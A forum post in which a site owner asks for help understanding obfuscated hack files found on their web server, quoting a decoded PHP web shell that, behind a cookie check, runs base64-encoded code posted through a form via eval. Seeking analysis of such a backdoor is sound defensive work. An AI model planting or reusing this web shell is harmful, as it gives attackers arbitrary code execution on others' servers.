I found a handful of hack files on our web server. I managed to de-obfuscate them a bit -- they all seem to have a part that decodes into a chunk that looks like:
if (!empty($_COOKIE['v']) and $_COOKIE['v']=='d'){if (!empty($_POST['c'])) {echo '<textarea rows=28 cols=80>'; $d=base64_decode(str_replace(' ','+',$_POST['c']));if($d) @eval($d); echo '</textarea>';}echo '<form action="" method=post><textarea cols=80 rows=28 name=c></textarea><br><input type=submit></form>';exit;}
But this chunk (decoded above) is usually embedded into a larger code snippet. I've shared the code of one of the files in its entirety here: http://pastie.org/3753704
I can sort of see where this code is going, but definitely not an expert at PHP and could use some help figuring out more specifically what it's doing or enabling. Also, if anyone happens to be familiar with this hack, any information on how it works, and where the backdoor and other components of the hack may be hidden would be super helpful and greatly appreciated.
I tried to Google parts of the code, to see if others have reported it, but only came up with this link: http://www.daniweb.com/web-development/php/threads/365059/hacked-joomla
Thanks!